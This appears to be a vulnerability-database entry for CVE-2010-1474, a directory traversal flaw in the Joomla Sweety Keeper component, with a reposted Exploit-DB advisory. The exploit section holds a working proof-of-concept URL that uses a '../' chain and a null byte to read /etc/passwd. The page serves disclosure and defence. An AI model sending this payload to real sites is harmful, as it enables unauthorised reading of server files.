CVE-2010-1474
Description
Directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Joomla! Component Sweetykeeper 1.5 - Local File Inclusion
==================================================================================================================
[o] Joomla Component Sweetykeeper Local File Inclusion Vulnerability
Software : com_sweetykeeper version 1.5.x
Vendor : http://www.joomlacorner.com/
Download : http://joomlacode.org/gf/project/thai/frs/?action=FrsReleaseView&release_id=9191
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/
==================================================================================================================
[o] Exploit
http://localhost/[path]/index.php?option=com_sweetykeeper&controller=[LFI]
[o] PoC
http://localhost/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00
==================================================================================================================
[o] Greetz
Angela Zhang stardustmemory aJe martfella pizzyroot Genex
H312Y yooogy mousekill }^-^{ noname matthews s4va wishnusakti
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke kaka11
==================================================================================================================
[o] April 12 2010 - GMT +07:00 Jakarta, Indonesia
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| supachai_teasakul | com_sweetykeeper | | |
| joomla | joomla\! | | |
References
- http://packetstormsecurity.org/1004-exploits/joomlasweetykeeper-lfi.txt
- http://secunia.com/advisories/39388
- http://www.exploit-db.com/exploits/12182
- http://www.securityfocus.com/bid/39399
- https://exchange.xforce.ibmcloud.com/vulnerabilities/57662
- http://packetstormsecurity.org/1004-exploits/joomlasweetykeeper-lfi.txt
- http://secunia.com/advisories/39388
- http://www.exploit-db.com/exploits/12182
- http://www.securityfocus.com/bid/39399
- https://exchange.xforce.ibmcloud.com/vulnerabilities/57662
CWEs
CWE-22
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.